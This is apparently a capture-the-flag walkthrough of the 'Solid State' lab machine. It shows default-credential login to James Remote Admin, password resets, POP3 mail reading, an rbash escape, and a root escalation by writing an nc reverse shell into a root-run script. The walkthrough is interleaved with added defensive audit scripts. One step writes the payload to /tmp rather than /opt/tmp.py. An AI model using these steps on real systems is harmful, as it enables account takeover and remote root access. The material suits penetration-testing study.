
Solid State

It was originally created for HackTheBox

1. Reconnaissance

Scanning the network to find the vulnerable machine's IP

arp-scan -l                                                                                    root@j0zack
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:9c:9d:c8, IPv4: 192.168.10.25
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:46:7f:87	PCS Systemtechnik GmbH
192.168.10.28	08:00:27:d4:af:6c	PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.276 seconds (112.48 hosts/sec). 4 responded
  • We find the IP of the vulnerable machine to be 192.168.10.28

2. Scanning

2.1 Nmap

  • Using nmap to find the open ports and their services

nmap -Pn -A -p- 192.168.10.28                                                                  root@j0zack
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 10:02 IST
Nmap scan report for 192.168.10.28
Host is up (0.0014s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.10.25 [192.168.10.25]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 08:00:27:D4:AF:6C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.39 ms 192.168.10.28

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.44 seconds
  • We find open ports 22, 25, 80, 110, 119 and 4555, running ssh, smtp, http, pop3, nntp and the Apache James Remote Admin service respectively.

  • We do not find anything interesting in the webpage
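As an added example (not part of this writeup), a small Python triage script that parses the port table `nmap -A` prints and attaches a hardening note to each open service. The sample text is a constructed excerpt modelled on the scan above, and the policy table and severities are my assumptions, not nmap output or anything from the James project. The point it makes from the scan: the James Remote Admin interface on 4555 is reachable from the network rather than bound to loopback, and the mail protocols are cleartext.

```python
"""Triage an nmap normal-output port table for services that deserve a hardening look."""
import re

# Constructed sample: the port table as printed by `nmap -A` in the scan above.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
25/tcp   open  smtp        JAMES smtpd 2.3.2
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
"""

# One PORT line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Assumed review policy (service name as nmap labels it -> severity, reason).
# Anything not listed is reported as "info" so nothing silently drops out.
POLICY = {
    "james-admin": ("high", "mail-server administration interface reachable on the network; "
                            "bind it to loopback and replace the default root:root account"),
    "pop3": ("medium", "cleartext mailbox access; credentials and mail bodies cross the wire unencrypted"),
    "smtp": ("low", "cleartext SMTP; verify STARTTLS is offered and relaying is not open"),
    "nntp": ("low", "NNTP exposed; confirm the service is actually needed"),
}
SEVERITY_ORDER = ("high", "medium", "low", "info")


def parse_ports(text):
    """Return one dict per PORT line; NSE script lines (starting with '|') are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({k: m.group(k) for k in ("port", "proto", "state", "service", "version")})
    return ports


def triage(ports):
    """Attach severity and reason to every open port, highest severity first."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        sev, reason = POLICY.get(p["service"], ("info", "no policy entry; review manually"))
        findings.append({**p, "port": int(p["port"]), "severity": sev, "reason": reason})
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f["severity"]))


if __name__ == "__main__":
    for f in triage(parse_ports(SAMPLE_NMAP_OUTPUT)):
        print(f"{f['severity']:6} {f['port']}/{f['proto']} {f['service']:12} {f['reason']}")
```

The same parser works on any `nmap` normal output saved with `-oN`; feed the file contents to `parse_ports` and extend `POLICY` with the services your environment cares about.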

2.2 James Remote Admin

  • The default credentials of the James Remote Administration tool are root : root

  • Logging in to the server via nc and using the default credentials.

nc 192.168.10.28 4555                                                                    1m 8s root@j0zack
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
  • We find 5 users

Welcome root. HELP for a list of commands
listusers

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
  • We can use the setpassword command to reset any user's password; here we reset mindy's password to 123456

setpassword mindy 123456
Password for mindy reset

2.3 POP3

  • We can use telnet to log in to the pop3 server and retrieve any useful information from the mails. (user mindy got some juicy info.)

telnet 192.168.10.28 110                                                                   30s root@j0zack
Trying 192.168.10.28...
Connected to 192.168.10.28.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
  • We can log in as mindy with the password 123456 and retrieve their mail.

user mindy
+OK
pass 123456
+OK Welcome mindy

list
+OK 2 1945
1 1109
2 836
  • We find 2 mails for mindy

  • Getting 1st mail

retr 1

+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
  • We find out that mindy recently joined the team and this is her welcome mail.

  • Getting 2nd mail

retr 2

+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
  • Here we get the ssh access credentials for mindy

mindy : P@55W0rd1!2@

3. Initial Foothold

3.1 SSH

  • Using ssh to remotely log in as mindy

ssh mindy@192.168.10.28                                                                    23s root@j0zack
mindy@192.168.10.28's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt 
914d0a4ebc1777889b5b89a23f556fd75

mindy@solidstate:~$ cd ..
-rbash: cd: restricted
  • Here we find user.txt and also notice that we are in a restricted bash (rbash) with limited commands

  • In order to get a regular bash shell with its full functionality, we simply use ssh again to log in as mindy, specifying bash as the remote command at the end of the ssh line.

ssh mindy@192.168.10.28 bash 

mindy@192.168.10.28's password: 
pwd
/home/mindy
  • Stabilizing the shell with a pty; listing /home shows 2 users, james and mindy

python -c 'import pty;pty.spawn("/bin/bash")'
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ../
cd ../
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
ls
james  mindy

4. Privilege Escalation

4.1 LinPeas

  • We can use the script LinPeas to find any vulnerabilities or potential privilege escalation vectors. Downloading the script from its repository to the /tmp directory, making it executable and running it.

mindy@solidstate:/tmp$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220417/linpeas.sh

Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 757.98K  2.52MB/s    in 0.3s    

2022-04-22 01:07:49 (2.52 MB/s) - 'linpeas.sh' saved [776167/776167]

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ chmod +x linpeas.sh

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./linpeas.sh
./linpeas.sh
 
  • The script shows an interesting file, /opt/tmp.py, which is writable by our user

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py
/run/lock
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
/var/tmp
  • Viewing the file, we see that it is a script run by root at regular intervals that executes a command removing every file and folder from the /tmp directory.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py

#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
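The LinPEAS finding above boils down to an ownership and permission check on a script that root executes on a schedule. As an added example (not from the writeup or from LinPEAS), here is a Python audit that applies the rule a hardened box should meet: both the script and its parent directory must be owned by a trusted uid and must not be writable by anyone else, because a writable file lets its contents be swapped and a writable parent lets the whole file be replaced. The temp-directory sample files, the `cleanup.py` name and the trusted-uid set are constructed for the demo.

```python
"""Audit whether a script executed by a privileged job can be modified by other users."""
import os
import stat
import tempfile


def audit_script(path, trusted_uids=(0,)):
    """Return a list of findings for `path`; an empty list means the script passed."""
    findings = []
    st = os.stat(path)
    mode = stat.filemode(st.st_mode)
    if st.st_uid not in trusted_uids:
        findings.append(f"{path}: owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({mode})")
    elif st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable ({mode})")

    # The parent directory matters just as much: if others can write to it, the
    # file can be renamed away and replaced regardless of the file's own mode.
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    pmode = stat.filemode(pst.st_mode)
    if pst.st_uid not in trusted_uids:
        findings.append(f"{parent}: directory owned by uid {pst.st_uid}, not a trusted uid")
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        findings.append(f"{parent}: world-writable directory without sticky bit ({pmode})")
    elif pst.st_mode & stat.S_IWGRP:
        findings.append(f"{parent}: group-writable directory ({pmode})")
    return findings


def build_demo():
    """Constructed sample: two harmless scripts in a private temp dir.

    `tmp.py` gets mode 666, mirroring the "writable by everyone" condition LinPEAS
    reports; `cleanup.py` gets 755, which is what a root-run job should look like.
    """
    base = tempfile.mkdtemp(prefix="script-audit-demo-")
    weak = os.path.join(base, "tmp.py")
    strong = os.path.join(base, "cleanup.py")
    for p in (weak, strong):
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python\nprint('cleanup placeholder')\n")
    os.chmod(weak, 0o666)
    os.chmod(strong, 0o755)
    return base, weak, strong


def run_demo():
    """Audit both sample scripts, trusting root and the uid that built the demo."""
    _, weak, strong = build_demo()
    trusted = (0, os.getuid())  # assumption for the demo: the builder counts as trusted
    return {"weak": audit_script(weak, trusted), "strong": audit_script(strong, trusted)}


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(f"{name}: {'PASS' if not findings else 'FAIL'}")
        for f in findings:
            print("  -", f)
```

Run against /opt/tmp.py on the box with the default `trusted_uids`, it reports whichever condition LinPEAS matched (a file mindy owns, or one writable by everyone). The fix is the same either way: `chown root:root` plus `chmod 755` (or 700) on the script, and the same audit applied to every path referenced from root's crontab or systemd timers.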
  • Since the file is writable, we can modify it to include an nc reverse shell (make sure to change the IP to your own)

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ echo 'import os; os.system("/bin/nc 192.168.10.25 1234 -e/bin/bash")' > tmp.py
  • We can open up a netcat listener and after a few moments, we get a shell as root.

nc -lvnp 1234                                                                                                                                     3s
listening on [any] 1234 ...
connect to [192.168.10.25] from (UNKNOWN) [192.168.10.28] 46220
  • We can stabilize the shell and get the root.txt file

python -c 'import pty;pty.spawn("/bin/bash")'

root@solidstate:~ cd /root

root@solidstate:~ ls
root.txt

root@solidstate:~ cat root.txt
b4c9723a28899b1c45db281d99cc87c9